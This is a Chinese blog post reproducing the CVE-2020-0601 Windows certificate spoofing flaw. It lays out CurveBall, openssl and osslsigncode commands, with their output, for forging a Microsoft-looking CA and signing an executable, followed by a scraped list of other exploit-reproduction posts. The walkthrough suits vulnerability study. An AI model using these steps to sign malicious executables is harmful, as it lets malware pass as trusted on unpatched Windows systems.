曈曚
曈曚

win证书漏洞CVE-2020-0601

影响版本:
Windows 10
Windows Server 2016/2019
依赖于Windows CryptoAPI的应用程序
查看win证书
查看一下本地windows证书,win+r输入certmgr.msc
win证书漏洞CVE-2020-0601_第1张图片
这里可以看到系统默认的ECC签名根证书,随便找一个导出:
win证书漏洞CVE-2020-0601_第2张图片
在这里插入图片描述
双击证书可以看到证书的详细信息:
win证书漏洞CVE-2020-0601_第3张图片
复现:

//安装 rudy
a@a-virtual-machine:~$ sudo apt install ruby
//若提示进程被占用解决方法
//ps -A | grep apt				列出使用的进程
//sudo kill -9 进程号				杀死进程
//生成spoofed_ca.key公钥文件
a@a-virtual-machine:~/CurveBall-master$ ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
//生成spoofed_ca.crt公钥文件
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
Can't load /home/a/.rnd into RNG
140535782355392:error:2406F079:random number generator:RAND_load_file:Cannot open file:../crypto/rand/randfile.c:88:Filename=/home/a/.rnd
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:aa
State or Province Name (full name) [Some-State]:aa
Locality Name (eg, city) []:aa
Organization Name (eg, company) [Internet Widgits Pty Ltd]:aa
Organizational Unit Name (eg, section) []:aa
Common Name (e.g. server FQDN or YOUR name) []:aa                               
Email Address []:aa															 '		
//生成cert.key密钥文件													
a@a-virtual-machine:~/CurveBall-master$ openssl ecparam -name secp384r1 -genkey -noout -out cert.key
//生成cert.csr文件
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs
//生成cert.crt签名证书
a@a-virtual-machine:~/CurveBall-master$ openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs
Signature ok
subject=C = DK, ST = Denmark, L = Copenhagen, O = ollypwn, CN = ollypwn
Getting CA Private Key
//生成cert.p12证书文件
a@a-virtual-machine:~/CurveBall-master$ openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12
Enter Export Password:
Verifying - Enter Export Password:
生成python_signed.exe签名可执行文件
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in python.exe -out python_signed.exe

Command 'osslsigncode' not found, but can be installed with:

sudo apt install osslsigncode

a@a-virtual-machine:~/CurveBall-master$ sudo apt install osslsigncode
[sudo] a 的密码: 
正在读取软件包列表... 完成
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out python_signed.exe
Succeeded

win证书漏洞CVE-2020-0601_第4张图片
win证书漏洞CVE-2020-0601_第5张图片
参考文献:
https://github.com/ollypwn/CurveBall
https://blog.csdn.net/Eastmount/article/details/104335673

你可能感兴趣的:(漏洞复现)

  • 管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现 0xSecl 漏洞复现v1安全web安全
    0x01产品简介管家婆订货易,帮助传统企业构建专属的订货平台,PC+微信+APP+小程序+h5商城5网合一,无缝对接线下的管家婆ERP系统,让用户订货更高效。支持业务员代客下单,支持多级推客分销,以客带客,拓展渠道。让企业的生意更轻松。0x02漏洞概述管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过该漏洞,上传恶意后门文件,深入利用可造
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 15(题目+回答) 独行soc 2025年护网面试职场和发展web安全安全linux渗透测试网络安全
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年HW(护网面试)151.实习经历2.CNVD证书类型3.登录窗口渗透测试流程4.验证码绕过实战手法技术型绕过(自动化)逻辑型绕过(手动测试)5.WAF绕过能力说明6.职业发展规划7.技术成长周期8.漏洞复现与运营2025年HW(护网面试)151、有没有实习过?在
  • Apache Kafka Connect接口存在任意文件读取漏洞与SSRF漏洞CVE-2025-27817 sublime88 漏洞复现apachekafka分布式安全web安全网络sql
    @[toc]免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。1.ApacheKafka简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发ApacheKafka是一个分布式的流式数据平台,可以用于构建实时的数据管道和流式应用程序
  • Apache Solr stream.url SSRF与任意文件读取漏洞(附pythonEXP脚本) MD@@nr丫卡uer 渗透测试
    漏洞背景ApacheSolr是一个开源的搜索服务,使用Java语言开发。ApacheSolr的某些功能存在过滤不严格,在ApacheSolr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。目前互联网已公开漏洞poc,建议相关用户及时采取措施阻止攻击。fofa查询app="APACHE-Solr"影响范围ApacheSolr所有版本漏洞复现首先访问,获取实
  • ffmpeg ,结合 SSRF任意文件读取漏洞 德古拉的杂货铺 渗透测试篇ffmpeg安全漏洞视频处理
    ffmpeg,结合SSRF任意文件读取漏洞前言一、ffmpeg是什么?FFmpeg背景知识简介HLS(HTTPLiveStreaming)二、使用步骤CentOS7下的安装三、ffmpeg任意文件读取漏洞复现环境搭建漏洞利用修复建议前言初衷:最近空闲,想通过vulhub靶场进行学习,猛的看到ffmpeg,很熟悉。在2018年开发的堡垒机时,曾经用过它进行视频文件的处理。于是决定从它开始练习写博客。
  • CVE-2017-15715 apache httpd换行解析漏洞复现 afei00123 #漏洞复现
    目录1.漏洞概述2.影响版本3.漏洞等级4.漏洞复现4.1Vulhub搭建漏洞环境4.2CVE-2017-15715换行解析漏洞利用5.漏洞修复1.漏洞概述在Apachehttpd2.4.0至2.4.29中,在中指定的表达式可以将'$'与恶意文件名中的换行符匹配,而不是仅匹配文件名的末尾。该漏洞的出现是由于apache在修复后缀名解析漏洞时,用正则来匹配后缀。在解析php时,xxx.php\x0A
  • Apache Solr stream.url 存在任意文件读取漏洞 sublime88 漏洞复现solrapacheweb安全
    文章目录ApacheSolrstream.url存在任意文件读取漏洞1.ApacheSolr简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾ApacheSolrstream.url存在任意文件读取漏洞1.ApacheSolr简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发Solr采用Java5开发,是建立在ApacheLuc
  • weblogic漏洞复现(CVE-2020-2555) 墨痕诉清风 渗透常识研究python开发语言
    漏洞环境:fofa自己找,server=weblogicport=7001一、漏洞简介该反序列化的gadget存在与coherence包中。具体可以见分析构造chain类似于common-collection的chain,可以照葫芦画瓢。mvn好像不能下载coherence包,很奇怪,直接下jar包就行。反序列化的对象,通过t3发送给weblogic即可。所以,这个只是生成payload的工具二、
  • 【漏洞复现】Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463) 点燃银河尽头的篝火(●'◡'●) #漏洞复现网络PaloAltoExpedition远程命令执行漏洞复现web安全漏洞
    免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!0x01产品介绍PaloAltoNetworksExpedition是一款强大的工具,帮助用户有效地迁移和优化网络安全策略
  • PaloAlto-Expedition OS命令注入漏洞复现(CVE-2025-0107) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。前言:我们建立了一个更多,更全的知识库。每日追踪最新的安全漏洞并提供批量性检测脚本。更多详情:https://pc.fenchuan8.com/#/i
  • CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
    漏洞概览漏洞名称:ApacheFlinkRESTAPI任意文件读取漏洞CVE编号:CVE-2020-17519CVSS评分:7.5影响版本:ApacheFlink1.11.0、1.11.1、1.11.2修复版本:≥1.11.3或≥1.12.0漏洞类型:路径遍历(PathTraversal)根本原因:JobManager的REST接口未对用户输入路径进行规范化校验,导致通过双重URL编码(%252f
  • Emlog Pro 任意文件上传漏洞(CVE-2023-44974) Point13reak CVE复现网络安全安全系统安全web安全
    靶机地址前来挑战!应急响应靶机训练-Web1漏洞原理/admin/plugin.php中存在任意文件上传漏洞使得攻击者能够通过上传构建的PHP文件来执行任意代码漏洞利用webshell上传(PHP木马)影响版本EmlogPro2.2.0修复方案更新当前系统或软件至最新版漏洞复现&#
  • CVE-2017-12629-XXE源码分析与漏洞复现 网安spinage Vulhub靶场web安全java网络安全漏洞solrxxe
    漏洞概述漏洞名称:ApacheSolrXML实体注入漏洞(XXE)漏洞编号:CVE-2017-12629CVSS评分:9.8影响版本:ApacheSolr&defType=xmlparserSolr路由到XmlQParserPlugin处理请求:publicQParsercreateParser(Stringqstr,SolrParamslocalParams,SolrParamsparams,S
  • 服务攻防-中间件安全&CVE 复现&Apache&Tomcat&Nginx @Camelus 渗透与攻防apache中间件安全web安全安全威胁分析
    目录前言:(一)Nginx-文件解析&命令执行1、Nginx文件解析漏洞复现1.1nginx解析漏洞(CVE-2013-4547)1.2Nginx文件解析漏洞复现1.3Nginx任意代码执行漏洞(CVE-2021-23017)Nginx1.1.9DNS解析漏洞(CVE-2021-23017)修复日记_迷路小书虫的技术博客_51CTO博客(二)Apache-RCE&目录遍历&文件解析1、Apache
  • MS16-075 漏洞 复现过程 浩策 提权&&权限维持web安全安全网络安全安全架构密码学
    目录一、MS16-075漏洞概述二、为什么称之为“甜土豆”提权?三、MS16-075漏洞复现步骤1.下载POC和EXP2.编译与准备EXP3.利用MS16-075漏洞提权(本地执行)4.将POC转换为CobaltStrikePayload四、通过CobaltStrike进行提权的详细步骤1.上传工具至目标主机2.执行提权命令3.利用CS内置模块提权五、提权成功后的进一步操作总结一、MS16-075
  • CNVD-2025-04094:Ollama未授权访问漏洞复现 gaynell 漏洞复现安全系统安全网络安全语言模型
    文章目录CNVD-2025-04094:Ollama未授权访问漏洞复现0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.复现0x06修复建议CNVD-2025-04094:Ollama未授权访问漏洞复现0x01前言免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负
  • vulfocus漏洞学习——redis 未授权访问 (CNVD-2015-07557) c30%00 学习
    目录一、漏洞介绍二、影响版本三、漏洞复现1.使用脚本四、漏洞原理一、漏洞介绍Redis是一个免费开源的键值存储数据库,数据默认存到内存中,用简单的C语言编写,能通过网络访问。该漏洞的成因是:在默认情况下,Redis会绑定到0.0.0.0:6379,这意味着Redis会直接暴露到公网上,而此时如果又没有设置密码认证,会导致任意用户在可以访问到目标服务器的情况下未授权访问Redis并读取Redis的数
  • Apache Apisix 安全漏洞(CVE-2020-13945) 星球守护者 漏洞复现apachejava安全
    文章目录0x01漏洞介绍0x02影响版本0x03漏洞编号0x04漏洞查询0x05漏洞环境0x06漏洞复现0x07修复建议免责声明摘抄0x01漏洞介绍ApacheApisix是Apache基金会的一个云原生的微服务API网关服务。该软件基于OpenResty和etcd来实现,具备动态路由和插件热加载,适合微服务体系下的API管理。ApacheAPISIX存在安全漏洞,该漏洞源于用户启用了管理API并
  • WordPress_Relevanssi Sql注入漏洞复现(CVE-2025-4396) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。前言:我们建立了一个更多,更全的知识库。每日追踪最新的安全漏洞并提供批量性检测脚本。更多详情:https://pc.fenchuan8.com/#/i
  • Ruby On Rails代码执行漏洞(CVE-2020-8163)技术分析与研判防护 东方隐侠安全团队-千里 【一】病毒木马·防护处置·蓝队rubyonrails安全web安全
    漏洞简介RubyonRails是Rails团队的一套基于Ruby语言的开源Web应用框架。RubyonRails5.0.1之前版本存在代码注入漏洞。远程攻击者可利用该漏洞发送特制请求执行任意代码。影响范围Rails<5.0.1环境搭建参考https://github.com/QianliZLP/CVE-2020-8163-即可漏洞复现Exp:exploit.rb#
  • WordPress_depicter Sql注入漏洞复现(CVE-2025-2011) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。前言:我们建立了一个更多,更全的知识库。每日追踪最新的安全漏洞并提供批量性检测脚本。更多详情:https://pc.fenchuan8.com/#/i
  • SysAid On-Prem XML注入漏洞复现(CVE-2025-2776) iSee857 漏洞复现xml安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。前言:我们建立了一个更多,更全的知识库。每日追踪最新的安全漏洞并提供批量性检测脚本。更多详情:https://pc.fenchuan8.com/#/i
  • WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512) 0xSecl 漏洞复现v1sql安全web安全
    0x01产品简介WordPress和WordPressplugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPressplugin是一个应用插件。0x02漏洞概述WordPressPluginMasterStudyLMS3.2.5版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转
  • Tomcat DOS漏洞复现(CVE-2025-31650) iSee857 漏洞复现tomcatjava安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。前言:我们建立了一个更多,更全的知识库。每日追踪最新的安全漏洞并提供批量性检测脚本。更多详情:https://pc.fenchuan8.com/#/i
  • 【漏洞复现】Apache Tomcat 远程代码执行(CVE-2025-24813) 李火火安全阁 漏洞复现Web安全apachetomcat
    文章目录前言免责声明一、漏洞描述二、影响范围三、利用条件四、环境配置五、漏洞复现六、修复方式前言该漏洞可导致非默认配置的Tomcat被攻击者进行利用,使用反序列化的内容实现RCE免责声明在网络安全领域,技术文章应谨慎使用,遵守法律法规,严禁非法网络活动。未经授权,不得利用文中信息进行入侵,造成的任何后果,由使用者自行承担,本文作者不负责。提供的工具仅限学习使用,严禁外用。一、漏洞描述CVE-202
  • Ivanti Connect Secure 堆栈溢出致远程代码执行漏洞复现(CVE-2025-0282)(附脚本) iSee857 漏洞复现安全web安全
    0x01产品描述:IvantiConnectSecure,以前称为PulseConnectSecure,是一款提供SSLVPN解决方案的产品。它允许远程用户通过一个安全的通道访问企业资源,确保数据在传输过程中的加密和安全。IvantiConnectSecure是由PulseSecure公司开发的,该公司后来被Ivanti收购,因此产品名称发生了变化。IvantiPolicySecure则是一个网络
  • CNVD-2020-10487复现(Apache Tomcat文件包含漏洞) afei00123 #漏洞复现
    目录1.漏洞概述2.影响范围3.风险等级4.漏洞复现4.1.tomcat环境搭建4.2.POC利用测试5.POC分析6.配合文件上传漏洞拿shell7.修复建议8.漏洞链接1.漏洞概述2020年2月20日,国家信息安全漏洞共享平台(CNVD)发布了ApacheTomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于TomcatAJP协议存在缺陷造成的。攻
  • Apache-OFBiz授权不当导致RCE (CVE-2024-38856) iSee857 漏洞复现apache
    0x01漏洞描述:ApacheOFBiz18.12.14之前版本存在命令执行漏洞,该漏洞源于ControlServlet和RequestHandler函数,在处理请求中存在授权错误,导致未经身份验证的远程攻击者通过构造特殊URL来覆盖最终的渲染视图,从而执行任意代码0x02影响版本:ApacheOFBiz<=18.12.140x03搜索语句:app="Apache_OFBiz"0x04漏洞复现:P
  • 【漏洞复现】Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104) 从不学安全 漏洞复现安全
    0x01产品简介ApacheOFBiz是一个功能强大、易于定制和扩展的开源ERP系统,适用于各种类型的企业。通过利用最新的技术标准和开源项目,ApacheOFBiz为企业提供了一个高效、稳定、灵活的电子商务平台解决方案。0x02漏洞概述ApacheOFBiz18.12.14之前版本存在命令执行漏洞,该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter
  • CVE-2024-36104 Apache OFBiz路径遍历RCE漏洞复现(附POC) CatalyzeSec web安全安全
    漏洞描述Apache_OFBiz是一套基于通用架构的企业应用程序,使用通用数据,逻辑和流程组件。应用程序的松散耦合特性使这些组件易于理解,扩展和定制。由于对HTTP请求URL中的特殊字符(如;、%2e)限制不当,威胁者可构造恶意请求利用该漏洞,成功利用可能导致远程代码执行。影响版本ApacheOFBiz<18.12.14FOFAapp="Apache_OFBiz"POCPOST/webtools/
  • 多线程编程之卫生间 周凡杨 java并发卫生间线程厕所
    如大家所知,火车上车厢的卫生间很小,每次只能容纳一个人,一个车厢只有一个卫生间,这个卫生间会被多个人同时使用,在实际使用时,当一个人进入卫生间时则会把卫生间锁上,等出来时打开门,下一个人进去把门锁上,如果有一个人在卫生间内部则别人的人发现门是锁的则只能在外面等待。问题分析:首先问题中有两个实体,一个是人,一个是厕所,所以设计程序时就可以设计两个类。人是多数的,厕所只有一个(暂且模拟的是一个车厢)。
  • How to Install GUI to Centos Minimal sunjing linuxInstallDesktopGUI
    http://www.namhuy.net/475/how-to-install-gui-to-centos-minimal.html   I have centos 6.3 minimal running as web server. I’m looking to install gui to my server to vnc to my server. You can insta
  • Shell 函数 daizj shell函数
    Shell 函数 linux shell 可以用户定义函数,然后在shell脚本中可以随便调用。 shell中函数的定义格式如下: [function] funname [()]{ action; [return int;] } 说明: 1、可以带function fun() 定义,也可以直接fun() 定义,不带任何参数。 2、参数返回
  • Linux服务器新手操作之一 周凡杨 Linux 简单 操作
    1.whoami      当一个用户登录Linux系统之后,也许他想知道自己是发哪个用户登录的。      此时可以使用whoami命令。      [ecuser@HA5-DZ05 ~]$ whoami       e
  • 浅谈Socket通信(一) 朱辉辉33 socket
    在java中ServerSocket用于服务器端,用来监听端口。通过服务器监听,客户端发送请求,双方建立链接后才能通信。当服务器和客户端建立链接后,两边都会产生一个Socket实例,我们可以通过操作Socket来建立通信。    首先我建立一个ServerSocket对象。当然要导入java.net.ServerSocket包    ServerSock
  • 关于框架的简单认识 西蜀石兰 框架
    入职两个月多,依然是一个不会写代码的小白,每天的工作就是看代码,写wiki。 前端接触CSS、HTML、JS等语言,一直在用的CS模型,自然免不了数据库的链接及使用,真心涉及框架,项目中用到的BootStrap算一个吧,哦,JQuery只能算半个框架吧,我更觉得它是另外一种语言。 后台一直是纯Java代码,涉及的框架是Quzrtz和log4j。 都说学前端的要知道三大框架,目前node.
  • You have an error in your SQL syntax; check the manual that corresponds to your 林鹤霄
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'option,changed_ids  ) values('0ac91f167f754c8cbac00e9e3dc372
  • MySQL5.6的my.ini配置 aigo mysql
    注意:以下配置的服务器硬件是:8核16G内存    [client]   port=3306   [mysql]   default-character-set=utf8     [mysqld]   port=3306   basedir=D:/mysql-5.6.21-win
  • mysql 全文模糊查找 便捷解决方案 alxw4616 mysql
    mysql 全文模糊查找 便捷解决方案 2013/6/14 by 半仙 [email protected] 目的: 项目需求实现模糊查找. 原则: 查询不能超过 1秒. 问题: 目标表中有超过1千万条记录. 使用like '%str%' 进行模糊查询无法达到性能需求. 解决方案: 使用mysql全文索引. 1.全文索引 : MySQL支持全文索引和搜索功能。MySQL中的全文索
  • 自定义数据结构 链表(单项 ,双向,环形) 百合不是茶 单项链表双向链表
         链表与动态数组的实现方式差不多,    数组适合快速删除某个元素    链表则可以快速的保存数组并且可以是不连续的       单项链表;数据从第一个指向最后一个   实现代码:        //定义动态链表 clas
  • threadLocal实例 bijian1013 javathreadjava多线程threadLocal
    实例1: package com.bijian.thread; public class MyThread extends Thread { private static ThreadLocal tl = new ThreadLocal() { protected synchronized Object initialValue() { return new Inte
  • activemq安全设置—设置admin的用户名和密码 bijian1013 javaactivemq
            ActiveMQ使用的是jetty服务器, 打开conf/jetty.xml文件,找到 <bean id="adminSecurityConstraint" class="org.eclipse.jetty.util.security.Constraint"> <p
  • 【Java范型一】Java范型详解之范型集合和自定义范型类 bit1129 java
    本文详细介绍Java的范型,写一篇关于范型的博客原因有两个,前几天要写个范型方法(返回值根据传入的类型而定),竟然想了半天,最后还是从网上找了个范型方法的写法;再者,前一段时间在看Gson, Gson这个JSON包的精华就在于对范型的优雅简单的处理,看它的源代码就比较迷糊,只其然不知其所以然。所以,还是花点时间系统的整理总结下范型吧。   范型内容 范型集合类 范型类
  • 【HBase十二】HFile存储的是一个列族的数据 bit1129 hbase
    在HBase中,每个HFile存储的是一个表中一个列族的数据,也就是说,当一个表中有多个列簇时,针对每个列簇插入数据,最后产生的数据是多个HFile,每个对应一个列族,通过如下操作验证   1. 建立一个有两个列族的表   create 'members','colfam1','colfam2'   2. 在members表中的colfam1中插入50*5
  • Nginx 官方一个配置实例 ronin47 nginx 配置实例
    user www www; worker_processes 5; error_log logs/error.log; pid logs/nginx.pid; worker_rlimit_nofile 8192; events { worker_connections 4096;} http { include conf/mim
  • java-15.输入一颗二元查找树,将该树转换为它的镜像, 即在转换后的二元查找树中,左子树的结点都大于右子树的结点。 用递归和循环 bylijinnan java
    //use recursion public static void mirrorHelp1(Node node){ if(node==null)return; swapChild(node); mirrorHelp1(node.getLeft()); mirrorHelp1(node.getRight()); } //use no recursion bu
  • 返回null还是empty bylijinnan javaapachespring编程
    第一个问题,函数是应当返回null还是长度为0的数组(或集合)? 第二个问题,函数输入参数不当时,是异常还是返回null? 先看第一个问题 有两个约定我觉得应当遵守: 1.返回零长度的数组或集合而不是null(详见《Effective Java》) 理由就是,如果返回empty,就可以少了很多not-null判断: List<Person> list
  • [科技与项目]工作流厂商的战略机遇期 comsci 工作流
          在新的战略平衡形成之前,这里有一个短暂的战略机遇期,只有大概最短6年,最长14年的时间,这段时间就好像我们森林里面的小动物,在秋天中,必须抓紧一切时间存储坚果一样,否则无法熬过漫长的冬季。。。。         在微软,甲骨文,谷歌,IBM,SONY
  • 过度设计-举例 cuityang 过度设计
    过度设计,需要更多设计时间和测试成本,如无必要,还是尽量简洁一些好。 未来的事情,比如 访问量,比如数据库的容量,比如是否需要改成分布式  都是无法预料的 再举一个例子,对闰年的判断逻辑:   1、 if($Year%4==0) return True; else return Fasle;   2、if (   ($Year%4==0  &am
  • java进阶,《Java性能优化权威指南》试读 darkblue086 java性能优化
    记得当年随意读了微软出版社的.NET 2.0应用程序调试,才发现调试器如此强大,应用程序开发调试其实真的简单了很多,不仅仅是因为里面介绍了很多调试器工具的使用,更是因为里面寻找问题并重现问题的思想让我震撼,时隔多年,Java已经如日中天,成为许多大型企业应用的首选,而今天,这本《Java性能优化权威指南》让我再次找到了这种感觉,从不经意的开发过程让我刮目相看,原来性能调优不是简单地看看热点在哪里,
  • 网络学习笔记初识OSI七层模型与TCP协议 dcj3sjt126com 学习笔记
      协议:在计算机网络中通信各方面所达成的、共同遵守和执行的一系列约定   计算机网络的体系结构:计算机网络的层次结构和各层协议的集合。   两类服务:   面向连接的服务通信双方在通信之前先建立某种状态,并在通信过程中维持这种状态的变化,同时为服务对象预先分配一定的资源。这种服务叫做面向连接的服务。   面向无连接的服务通信双方在通信前后不建立和维持状态,不为服务对象
  • mac中用命令行运行mysql dcj3sjt126com mysqllinuxmac
    参考这篇博客:http://www.cnblogs.com/macro-cheng/archive/2011/10/25/mysql-001.html  感觉workbench不好用(有点先入为主了)。 1,安装mysql 在mysql的官方网站下载 mysql 5.5.23 http://www.mysql.com/downloads/mysql/,根据我的机器的配置情况选择了64
  • MongDB查询(1)——基本查询[五] eksliang mongodbmongodb 查询mongodb find
    MongDB查询 转载请出自出处:http://eksliang.iteye.com/blog/2174452 一、find简介 MongoDB中使用find来进行查询。 API:如下 function ( query , fields , limit , skip, batchSize, options ){.....}  参数含义: query:查询参数 fie
  • base64,加密解密 经融加密,对接 y806839048 经融加密对接
    String data0 = new String(Base64.encode(bo.getPaymentResult().getBytes(("GBK")))); String data1 = new String(Base64.decode(data0.toCharArray()),"GBK"); // 注意编码格式,注意用于加密,解密的要是同
  • JavaWeb之JSP概述 ihuning javaweb
      什么是JSP?为什么使用JSP? JSP表示Java Server Page,即嵌有Java代码的HTML页面。使用JSP是因为在HTML中嵌入Java代码比在Java代码中拼接字符串更容易、更方便和更高效。   JSP起源    在很多动态网页中,绝大部分内容都是固定不变的,只有局部内容需要动态产生和改变。  如果使用Servl
  • apple watch 指南 啸笑天 apple
    1. 文档 WatchKit Programming Guide(中译在线版 By @CocoaChina) 译文 译者 原文 概览 - 开始为 Apple Watch 进行开发 @星夜暮晨 Overview - Developing for Apple Watch 概览 - 配置 Xcode 项目 - Overview - Configuring Yo
  • java经典的基础题目 macroli java编程
    1.列举出 10个JAVA语言的优势 a:免费,开源,跨平台(平台独立性),简单易用,功能完善,面向对象,健壮性,多线程,结构中立,企业应用的成熟平台, 无线应用 2.列举出JAVA中10个面向对象编程的术语 a:包,类,接口,对象,属性,方法,构造器,继承,封装,多态,抽象,范型 3.列举出JAVA中6个比较常用的包 Java.lang;java.util;java.io;java.sql;ja
  • 你所不知道神奇的js replace正则表达式 qiaolevip 每天进步一点点学习永无止境纵观千象regex
    var v = 'C9CFBAA3CAD0'; console.log(v); var arr = v.split(''); for (var i = 0; i < arr.length; i ++) { if (i % 2 == 0) arr[i] = '%' + arr[i]; } console.log(arr.join('')); console.log(v.r
  • [一起学Hive]之十五-分析Hive表和分区的统计信息(Statistics) superlxw1234 hivehive分析表hive统计信息hive Statistics
    关键字:Hive统计信息、分析Hive表、Hive Statistics   类似于Oracle的分析表,Hive中也提供了分析表和分区的功能,通过自动和手动分析Hive表,将Hive表的一些统计信息存储到元数据中。   表和分区的统计信息主要包括:行数、文件数、原始数据大小、所占存储大小、最后一次操作时间等;   14.1 新表的统计信息 对于一个新创建
  • Spring Boot 1.2.5 发布 wiselyman spring boot
        Spring Boot 1.2.5已在7月2日发布,现在可以从spring的maven库和maven中心库下载。   这个版本是一个维护的发布版,主要是一些修复以及将Spring的依赖提升至4.1.7(包含重要的安全修复)。   官方建议所有的Spring Boot用户升级这个版本。   项目首页 | 源
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他